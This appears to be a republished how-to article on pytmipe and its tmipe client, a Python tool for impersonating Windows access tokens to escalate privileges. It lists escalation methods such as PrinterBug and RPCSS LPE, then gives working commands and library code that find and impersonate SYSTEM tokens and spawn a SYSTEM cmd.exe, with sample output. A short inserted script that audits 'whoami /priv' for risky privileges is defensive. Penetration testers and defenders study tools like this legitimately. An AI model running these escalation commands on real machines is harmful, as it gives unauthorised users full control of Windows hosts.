2025-04-08 Update From: SLTechnology News&Howtos > Development
Shulou (Shulou.com) 06/03 Report
How to use pytmipe for token manipulation and privilege escalation on Windows

This article introduces pytmipe and its client tmipe, which manipulate and impersonate Windows access tokens to escalate privileges, and walks through the commands and library calls used in practice.
PYTMIPE & TMIPE
PYTMIPE (Python library for Token Manipulation, Impersonation and Privilege Escalation) is a Python 3 library for manipulating and impersonating access tokens on Windows in order to escalate privileges. TMIPE is a Python 3 command-line client built on the pytmipe library.
The project contains:
- A Python client: tmipe (python3 tmipe.py)
- A Python library, pytmipe, for integrating this project into other projects
- Pyinstaller samples for building stand-alone executables
Main functions

Method                                   | Required permissions                      | Operating system (not all)                  | Direct goal (best effect)
-----------------------------------------|------------------------------------------|---------------------------------------------|---------------------------------------
Token creation & impersonation           | User name & password                     | All                                         | Local administrator
Token impersonation & theft              | SeDebugPrivilege                         | All                                         | NT AUTHORITY\SYSTEM
Parent PID spoofing (handle inheritance) | SeDebugPrivilege                         | >= Vista                                    | NT AUTHORITY\SYSTEM
Service (SCM)                            | Local administrator                      | All                                         | NT AUTHORITY\SYSTEM or domain account
WMI event                                | Local administrator                      | All                                         | NT AUTHORITY\SYSTEM
"PrinterBug" LPE                         | SeImpersonatePrivilege (service account) | Windows 8.1, 10 & Server 2012R2/2016/2019   | NT AUTHORITY\SYSTEM
RPCSS service LPE                        | SeImpersonatePrivilege (service account) | Windows 10 & Server 2016/2019               | NT AUTHORITY\SYSTEM
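The "Required permissions" column is the part of this table a defender can act on: a service account that holds SeImpersonatePrivilege or SeDebugPrivilege holds the prerequisite for the corresponding rows. The following script, added here as an illustration and not part of pytmipe, parses the text output of `whoami /priv` (a constructed sample is embedded) and reports which of the table's prerequisite privileges an account holds, so over-privileged service accounts can be spotted during a hardening review. The privilege-to-method mapping and the inclusion of SeAssignPrimaryTokenPrivilege (commonly granted together with SeImpersonatePrivilege) are the example's own assumptions.

```python
"""Audit whether an account holds the token-abuse prerequisites named in the
method table, based on `whoami /priv` text output (sample constructed below)."""

# Prerequisite privileges from the table, mapped to the methods they enable.
# SeAssignPrimaryTokenPrivilege is added as an assumption: it is routinely
# granted to service accounts alongside SeImpersonatePrivilege.
SENSITIVE_PRIVILEGES = {
    "SeDebugPrivilege": ["token impersonation & theft", "parent PID spoofing"],
    "SeImpersonatePrivilege": ["PrinterBug LPE", "RPCSS service LPE"],
    "SeAssignPrimaryTokenPrivilege": ["assigning a primary token to a new process"],
}

# Constructed sample of `whoami /priv` output for a typical service account.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output.

    Data rows follow the '=====' separator line. The Description column may
    contain spaces, so the privilege name is the first whitespace-separated
    field and the state is the last one.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        privs[fields[0]] = fields[-1]
    return privs


def assess_token_abuse_exposure(privs):
    """List the sensitive privileges the account holds, whether Enabled or
    Disabled (a Disabled privilege is still held and can be enabled by the
    holder), with the methods from the table they make possible."""
    findings = []
    for name, methods in SENSITIVE_PRIVILEGES.items():
        if name in privs:
            findings.append({"privilege": name, "state": privs[name], "methods": methods})
    return findings


if __name__ == "__main__":
    for f in assess_token_abuse_exposure(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{f['privilege']:32} {f['state']:9} enables: {', '.join(f['methods'])}")
```

Feed it real output by replacing the sample string with the text captured from `whoami /priv` run under the account being reviewed; any finding is a reason to check whether that account really needs the privilege.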
Tool dependencies
ctypes is used heavily, and many pywin32 functions have been reimplemented in pytmipe for better portability. Currently, due to time constraints, the task scheduler module still uses pywin32 (more specifically, pythoncom); all other modules use ctypes only.
Tool download
Researchers can clone the project's source code locally with the following command:
    git clone https://github.com/quentinhardy/pytmipe.git
For the Python client (tmipe):
    python.exe tmipe.py -h
    usage: tmipe.py [-h] [--version]
                    {cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
                    ...

    (ASCII-art banner)
    Token Manipulation, Impersonation and Privilege Escalation (Tool)
    By Quentin HARDY (quentin.hardy@protonmail.com)

    positional arguments:
      {cangetadmin,printalltokens,printalltokensbyname,printalltokensbypid,printsystemtokens,searchimpfirstsystem,imppid,imptoken,printerbug,rpcss,spoof,impuser,runas,scm}
                            Choose a main command
        cangetadmin         Check if user can get admin access
        printalltokens      Print all tokens accessible from current thread
        printalltokensbyname
                            Print all tokens accessible from current thread by account name
        printalltokensbypid Print all tokens accessible from current thread by pid
        printsystemtokens   Print all system tokens accessible from current thread
        searchimpfirstsystem
                            search and impersonate first system token
        imppid              impersonate primary token of selected pid and try to spawn cmd.exe
        imptoken            impersonate primary or impersonation token of selected pid/handle and try to spawn cmd.exe
        printerbug          exploit the "printerbug" for getting system shell
        rpcss               exploit "rpcss" for getting system shell
        spoof               parent PID Spoofing ("handle inheritance")
        impuser             create process with creds with impersonation
        runas               create process with creds as runas
        scm                 Create process with Service Control Manager

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
For the Python library (pytmipe), read the source code and samples directly; the code is documented in detail.
For the pyinstaller samples and executables, see the project's src/examples/ folder.
Tool usage
Sample 1: get NT AUTHORITY\SYSTEM
To impersonate the first SYSTEM token found and open cmd.exe with SYSTEM privileges (using the Python client tmipe):
    python.exe tmipe.py searchimpfirstsystem -vv
We can also use the pytmipe library directly to do the same:
    from impersonate import Impersonate
    from utils import configureLogging

    configureLogging()
    imp = Impersonate()
    # Look for the first accessible SYSTEM token and impersonate it
    imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)
Sample 2: list tokens
Print the primary token of the current process, with full details and the linked token:
    python.exe tmipe.py printalltokens --current --full --linked
Output:
    - PID: 3212
      - PID: 3212
      - type: Primary (1)
      - token: 764
      - hval: None
      - ihandle: None
      - sid: S-1-5-18
      - accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
      - intlvl: System
      - owner: S-1-5-32-544
      - Groups:
        - S-1-5-32-544: {'Name': 'Administrators', 'Domain': 'BUILTIN', 'type': 4} (ENABLED, ENABLED_BY_DEFAULT, OWNER)
        - S-1-1-0: {'Name': 'Everyone', 'Domain': '', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
        - S-1-5-11: {'Name': 'Authenticated Users', 'Domain': 'NT AUTHORITY', 'type': 5} (ENABLED, ENABLED_BY_DEFAULT, MANDATORY)
        - S-1-16-16384: {'Name': 'System Mandatory Level', 'Domain': 'Mandatory Label', 'type': 10} (INTEGRITY_ENABLED, INTEGRITY)
      - Privileges (User Rights):
        - SeAssignPrimaryTokenPrivilege: Enabled
        [...]
        - SeTrustedCredManAccessPrivilege: Enabled
      - issystem: True
      - sessionID: 1
      - elevationtype: Default (1)
      - iselevated: True
      - Linked Token: None
      - tokensource: [garbled in the original]
      - primarysidgroup: S-1-5-18
      - isrestricted: False
      - hasrestricitions: True
      - Default DACL:
        - {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0x10000000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-18'}
        - {'ace_type': 'ALLOW', 'ace_flags': '', 'rights': '0xa0020000', 'object_guid': '', 'inherit_object_guid': '', 'account_sid': 'S-1-5-32-544'}
        [...]
      - Mandatory Policy: NO_WRITE_UP
To list all tokens accessible from the current thread, grouped by PID, use the following command:
    python.exe tmipe.py printalltokensbypid --imp-only
Output:
    [...]
    - PID 4276:
      - S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
    - PID 7252:
      - None
    - PID 1660:
      - S-1-5-21-28624056-3392308708-440876048-1106: DOMAIN\USER (possible imp: True)
      - S-1-5-20: NT AUTHORITY\NETWORK SERVICE (possible imp: True)
      - S-1-5-18: NT AUTHORITY\SYSTEM (possible imp: True)
      - S-1-5-90-0-1: Window Manager\DWM-1 (possible imp: True)
      - S-1-5-19: NT AUTHORITY\LOCAL SERVICE (possible imp: True)
    [...]
If you want to use the pytmipe library to do this, it is also very simple:
    from impersonate import Impersonate
    from utils import configureLogging

    configureLogging()
    imp = Impersonate()
    # Print every token accessible from the current thread, with full details and linked tokens
    imp.printAllTokensAccessible(targetPID=None, printFull=True, printLinked=True, _useThreadMethod=False)
Sample 3: impersonate a chosen token
We can pick a specific token to impersonate. The first step is to list all tokens that match a filter:
    python.exe tmipe.py printalltokens --filter "{\"sid\":\"S-1-5-18\",\"canimpersonate\": true}"
Output:
    [...]
    - PID: 2288
      - PID: 2288
      - type: Impersonation (2)
      - token: 2504
      - ihandle: 118
      - sid: S-1-5-18
      - accountname: {'Name': 'SYSTEM', 'Domain': 'NT AUTHORITY', 'type': 1}
      - intlvl: System
      - owner: S-1-5-18
      - issystem: True
      - elevationtype: Default (1)
      - iselevated: True
      - linkedtoken: None
      - implevel: Impersonate (2)
      - appcontainertoken: False
      [...]
      - primarysidgroup: S-1-5-18
      - isrestricted: False
      - hasrestricitions: True
      - Mandatory Policy: VALID_MASK
      - canimpersonate: True
    [...]
The output shows a token that can be impersonated in PID 2288 (handle 118) with integrity level System. You can impersonate this specific token with the following command:
    python.exe tmipe.py imptoken --pid 2288 --ihandle 118 -vv
This command opens cmd.exe with NT AUTHORITY\SYSTEM privileges. The same effect can be achieved with the pytmipe library; the following source code impersonates the first available SYSTEM impersonation token and prints the effective token of the current thread before and after ending the impersonation:
    from impersonate import Impersonate
    from windef import TokenImpersonation

    imp = Impersonate()
    # Only SYSTEM (S-1-5-18) impersonation tokens that can actually be impersonated
    allTokens = imp.getTokensAccessibleFilter(targetPID=None,
                                              filter={'canimpersonate': True, 'sid': 'S-1-5-18', 'type': TokenImpersonation},
                                              _useThreadMethod=False)
    if allTokens == {} or allTokens is None:
        print("No one token found for impersonation")
    else:
        pid = list(allTokens.keys())[0]  # use the first token of the first pid returned in 'allTokens'
        firstIHandle = allTokens[pid][0]['ihandle']
        imp.printThisToken(allTokens, pid, firstIHandle)
        imp.impersonateThisToken(pid=pid, iHandle=firstIHandle)
        print("Current Effective token for current thread after impersonation:")
        imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)
        imp.terminateImpersonation()
        print("Current Effective token for current thread (impersonation finished):")
        imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False)